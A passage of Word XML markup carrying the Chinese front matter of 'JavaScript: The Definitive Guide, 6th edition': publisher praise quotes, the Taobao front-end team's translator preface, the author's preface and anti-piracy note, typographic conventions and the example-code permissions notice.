      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>革命的主要先锋；公司一如既往地通过多种形式缔结信息与人的纽带。</w:t>
      </w:r>
      <w:r>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>的会议和峰会集聚了众多超级极客和高瞻远瞩的商业领袖，共同描绘出开创新产业的革命性思想。作为技术人士获取信息的选择，</w:t>
      </w:r>
      <w:r>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>现在还将先锋专家的知识传递给普通的计算机用户。无论是通过书籍出版，在线服务或者面授课程，每一项</w:t>
      </w:r>
      <w:r>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>的产品都反映了公司不可动摇的理念</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>信息是激发创新的力量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="Ye_Jie_Ping_Lun_"/>
      <w:r>
        <w:t>业界评论</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>“O'Reilly Radar</w:t>
      </w:r>
      <w:r>
        <w:t>博客有口皆碑。</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para15"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>——Wired</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>凭借一系列（真希望当初我也想到了）非凡想</w:t>
      </w:r>
      <w:r>
        <w:t>法建立了数百万美元的业务。</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para15"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>——Business 2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“O'Reilly Conference</w:t>
      </w:r>
      <w:r>
        <w:t>是聚集关键思想领袖的绝对典范。</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para15"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>——CRN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>一本</w:t>
      </w:r>
      <w:r>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>的书就代表一个有用、有前途、需要学习的主题。</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para15"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>——Irish Times</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“Tim</w:t>
      </w:r>
      <w:r>
        <w:t>是位特立独行的商人，他不光放眼于最长远、最广阔的视野并且切实地按照</w:t>
      </w:r>
      <w:r>
        <w:t>Yogi Berra</w:t>
      </w:r>
      <w:r>
        <w:t>的建议去做了：</w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>如果你在路上遇到岔路口，走小路（岔路）。</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>回顾过去</w:t>
      </w:r>
      <w:r>
        <w:t>Tim</w:t>
      </w:r>
      <w:r>
        <w:t>似乎每一次都选择了小路，而且有几次都是一闪即逝的机会，尽管大路也不错。</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para15"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>——Linux Journa</w:t>
      </w:r>
      <w:r>
        <w:t>l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="Yi_Zhe_Xu_"/>
      <w:bookmarkStart w:id="6" w:name="Yi_Zhe_Xu_____Cong_1996Nian_Yi_Lai____Ja"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>译者序</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>1996</w:t>
      </w:r>
      <w:r>
        <w:t>年以来，《</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>权威指南》已经成为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序员公认的《圣经》。该书凭借着完整的内容、细致的讲解以及大量针对性的示例而受到读者的一贯好评，十多年来一直畅销不衰。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>之父</w:t>
      </w:r>
      <w:r>
        <w:t>Brendan Eich</w:t>
      </w:r>
      <w:r>
        <w:t>对它如是评价：</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>本书是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序员的必备参考</w:t>
      </w:r>
      <w:r>
        <w:t>……</w:t>
      </w:r>
      <w:r>
        <w:t>内容组织得很好，而且非常详细。</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>作为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>最经典的工具书，它的历次改版见证了</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>发展的历程与深刻变革：从玩具式的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>轻脚本</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>到革命性的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>，从传统的桌面系统到新潮的手持终端，从风靡一时的类库到现在主流当道的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>富应用开发，从纯浏览器脚本语言到面向服务器端的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript……HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>NodeJS</w:t>
      </w:r>
      <w:r>
        <w:t>等新技术的出现进一步丰富了</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>前端开发的内涵，而本书第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>次改版则是一场及时雨，系统翔实地收录了五年来前端技术的这些变革，并提供了大量的实例，可以边学边用，同时秉承了前几版的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>学术气质</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，是</w:t>
      </w:r>
      <w:r>
        <w:t>Jav</w:t>
      </w:r>
      <w:r>
        <w:t>aScript</w:t>
      </w:r>
      <w:r>
        <w:t>和前端开发领域不可多得的佳作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>版涵盖了</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>，很多章节完全重写，增加了当今</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>开发的最佳实践的内容，新增的章节包括</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>、服务器端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>、图形编程以及</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>式的面向对象。本</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>书第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>版不仅适合初学者系统学习，而且适合有经验的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>开发者随手翻阅。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>淘宝前端团队非常荣幸地承担这本大厚书的翻译任务。本书书名为《</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>权威指南（第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>版）》，我们作为译者深知自己知识面有限，难达到</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>权威</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的高度，所以翻译</w:t>
      </w:r>
      <w:r>
        <w:t>过程难免疏漏。但不管怎样，这项任务是一种荣誉，更是一种责任。本次翻译共有</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>位译者，李晶（拔赤）、张散集（一舟）、吴英杰（季札）、赵静（澄净）、陈成（云谦）、王保平（玉伯）和鄢学（三七）。感谢赵泽欣（小马）为促成本次翻译做出的努力。此外为了保证翻译质量，我们还邀请了热心网友来参与部分章节的校对，尤其是杨明明、孙博、朱琦三位读者为本书关键章节提出了中肯的修改意见，非常感谢他们。最后要特别感谢机械工业出版社华章公司的陈冀康老师和谢晓芳编辑，不仅容忍我们再三推迟交稿，还不断鼓励我们</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>多花些时间来保证质量</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。在此对上</w:t>
      </w:r>
      <w:r>
        <w:t>述各位同学和老师致以深深的感谢。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para17"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>淘宝前端团队</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="Qian_Yan_"/>
      <w:bookmarkStart w:id="8" w:name="Qian_Yan_____Ben_Shu_Yao_Jiang_Shu_De_Ne"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>前言</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书要讲述的内容涵盖</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言本身，以及</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器所实现的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript API</w:t>
      </w:r>
      <w:r>
        <w:t>。本书更适合有一定编程经验的人阅读。对于那些希望学习</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>和已经开始使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的程序员来说，如果想让自己对</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言和</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>平台的理解和掌握再上一个台阶，本书最适合不过了。本书旨在系统权威地讲解</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>这门语言以及运行它的各种平台环境。本书对各个知识点的讲解都非常详细，以至于本书成了大块头。我希望每个</w:t>
      </w:r>
      <w:r>
        <w:t>读者都能认真阅读本书，这会让你的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>编程基本功更加夯实，你所花费的时间和精力终究会有成倍的回报。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书分为</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>部分，第一部分主要讲述</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>这门语言。第二部分主要讲述客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>和相关标准定义的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript API</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器实现的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。第三部分是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心部分的参考手册。第四部分是客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的参考手册。第</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>章包含前两部分的章节提纲和简介（参照</w:t>
      </w:r>
      <w:r>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>版同时涵盖</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>Script</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心的最新版本）和</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>平台的最新版本）。第一部分包含</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>相关的资料。而与</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>相关的新资料主要在第二部分末尾的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>章节讲述，当然其他章节也有提到。第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>版新增的章节有：第</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>章、第</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>章、第</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t>章以及第</w:t>
      </w:r>
      <w:r>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:t>章。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果你阅读过前几版，则会发现第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>版中很多章节都完全重写了。第一部分中的核心章节都涵盖全新的内容（对象、数组、函数以及类），这些内容都是当下最前沿的编程技术和最佳实践。同样，第二部分的核心章节，比如第</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>章和第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章，也与时俱进全都重写了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="Guan_Yu_Dao_Ban_"/>
      <w:r>
        <w:t>关于盗版</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果你（或你的雇主）没有为阅读本书电子版付费（或者从其他的付费读者那里借阅本书），那么你的行为很可能涉及侵权。撰写本书第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>版是我的全职工作，花费了我一年多时间。我能得到的所有报酬均来自读者的购买费用。如果第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>版的撰写为我带来的收益无法继续支撑我的工作，我将无法完成本书第</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>版的编撰。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管盗版行为让人不可容忍，但如果你手上已经有了一本盗版书，不妨试着读一读你感兴趣的几章。相信你会发觉本书的价值所在，它的确是你学习</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>不可多得的好教材</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>内容安排清晰、质量上乘，这绝不是随便从网上拿来几篇文章拼凑</w:t>
      </w:r>
      <w:r>
        <w:t>成的二流读物。如果你能认识到这是一套非常不错的学习材料的话，请你从正</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当途径购买此书（电子版或纸质书）。反过来讲，如果你的确觉得本书没有网上的免费信息有价值，那么请停止你的侵权行为，去使用互联网上的免费信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="Ben_Shu_Yue_Ding_____Ben_Shu_Shi_Yong_Xi"/>
      <w:bookmarkStart w:id="11" w:name="Ben_Shu_Yue_Ding_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>本书约定</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书使用下列排版约定：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>斜体（</w:t>
      </w:r>
      <w:r>
        <w:t>Italic</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用于强调重点或者表示术语的首次使用，此外它还用来表示电子邮件地址、网址和文件名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>等宽字体（</w:t>
      </w:r>
      <w:r>
        <w:t>Constant width</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所有的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码、</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>代码清单都使用等宽字体表示，以及程序设计时要输入的任何内容也用等宽字体表示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>等宽斜体（</w:t>
      </w:r>
      <w:r>
        <w:t>Constant width italic</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>等宽斜体用来表示函数参数名或者表示一个占位符，占位符常用来替换成程序中的实际值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="Shi_Li_Dai_Ma_____Ben_Shu_Zhong_De_Suo_Y"/>
      <w:bookmarkStart w:id="13" w:name="Shi_Li_Dai_Ma_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>示例代码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书中的所有示例代码都可以在网上找到。可以从</w:t>
      </w:r>
      <w:r>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>出版社网站给出的本书的分类页面中找到想要的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>http://oreilly.com/catalog/9780596805531/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这里的代码是为了帮助你更好地理解本书的内容的。通常，可以在程序或文档中使用本书中的代码，而不需要联系</w:t>
      </w:r>
      <w:r>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>获得许可，除非需要大段大段地复制代码。例如，使用本书</w:t>
      </w:r>
      <w:r>
        <w:t>中所提供的几个代码片段来编写一个程序不需要得到我们的许可。但销售或发布</w:t>
      </w:r>
      <w:r>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>的配套</w:t>
      </w:r>
      <w:r>
        <w:t>CD-ROM</w:t>
      </w:r>
      <w:r>
        <w:t>则需要</w:t>
      </w:r>
      <w:r>
        <w:t>O'Reilly</w:t>
      </w:r>
      <w:r>
        <w:t>出版社的许可。引用本书的示例代码来回答一个问题也不需要许可；将本书中的示例代码的很大一部分放入到自己的产品文档中确实需要获得许可。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>非常欢迎读者使用本书中的代码，不用注明出处。注明出处的形式包含标题、作者、出版社和</w:t>
      </w:r>
      <w:r>
